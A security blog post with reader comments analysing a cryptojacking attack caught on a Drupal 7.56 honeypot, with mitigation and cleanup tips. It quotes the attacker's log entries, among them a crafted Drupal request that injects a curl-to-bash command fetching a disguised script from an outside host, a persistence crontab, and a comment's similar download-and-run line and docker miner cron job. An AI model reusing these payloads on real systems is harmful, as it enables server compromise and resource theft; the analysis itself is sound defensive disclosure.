Suppoie Crypto Hijack

Suppoie Crypto Hijack

We found an interesting hack using a Drupal 7.56 honeypot. The attacker used a specially crafted URL to pull down a jpeg image, which turned out to be a script. The script connects to a Monero mining pool, and starts mining crypto from the server automatically. Vulnerability used is via Curl in this version of Drupal.

Here’s all of the traffic from the attacker:

81.92.203.123 - - [24/Apr/2018:01:34:08 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 36607 "-" "Ruby"

81.92.203.123 - - [24/Apr/2018:02:00:41 +0000] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 21915 "-" "Ruby"

81.92.203.123 - - [24/Apr/2018:02:00:42 +0000] "POST /?q=file/ajax/name/%23value/form-RR2WlQ5bBKZlJcllzKJ16U3bf-IU_aIP8ALAzixqPZw HTTP/1.1" 200 1931 "-" "Ruby"

 

The file logo7.jpg pulled down from gmicameroon.com site is a script that runs the miner in /var/tmp/suppoie running as www-data on the device:

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Created /var/tmp/suppoie (d9531f405d7231ac1e518e5bc3d1da8c) and config.json. The config.json file has embedded credentials to login to the mining pool under user

'47M4CxQoC46hxKL1De83oZ6J2sYDPqyKN2F6sovD5mSHAKA4SrwYXmMBBJ75waQb3qZDAf6uA9HMtg9h9PSMst1k1EsUdwp':

 

A crontab is created to keep the script going:

[email protected] /var/tmp # crontab -u www-data -l
* * * * * curl -s http://gmicameroon.com/logo7.jpg | bash -s

 

If you’re interested in doing analysis, I’ve added the code to download all of the files, password to the zip is infected.

Here’s an analysis courtesy of the JoeSandBox tool we often use to analyze Malware on this site.

 

3 Replies to “Suppoie Crypto Hijack”

  1. Found it on a fresh microk8s installation I had setup for testing. Unfortunately, the default install of microk8s is completely unsecured and within days it was hijacked.
    Command line :
    curl -o /var/tmp/config.json http://192.99.142.232:8220/222.json;curl’ defer onload=’ -o /var/tmp/suppoie1 http://192.99.142.232:8220/tte2;chmod 777 /var/tmp/suppoie1;cd /var/tmp;./suppoie1 -c config.json

    Creates a bunch of cron tasks such as:
    * * * * * root /usr/bin/docker run -d –name java123 –restart=always –read-onl
    y -m 50M -c 512 tazaddobammi/picture124 -o 192.99.142.232:80 -o 192.99.142.249:3
    333 -o 202.144.193.110:3333 –donate-level 1 -u 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3w
    ra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg -p x -k

    Conclusion: do NOT install microk8s with its default config on a server exposed to internet

  2. I’ve found it as replicationcontroller of my kubernetes cluster running under microk8s. It has added to docker the following images ahtihhebs/picture126 and ahtihhebs/picture128 running 10 replicas of one of them. Each replica was executing a suppoie1 command and adding an /etc/crontab record with a python string.
    To remove: remove all crontab entries, kill all processes – `pkill suppoie1` and removed the replicacontroller from kubernets to stop it from recreating.

  3. We found the same here. In the /var/tmp directory look for a new directory called ‘…’ and owned by www-data; it contained miner data. Use rm -rf … to remove that directory.

Leave a Reply

Your email address will not be published. Required fields are marked *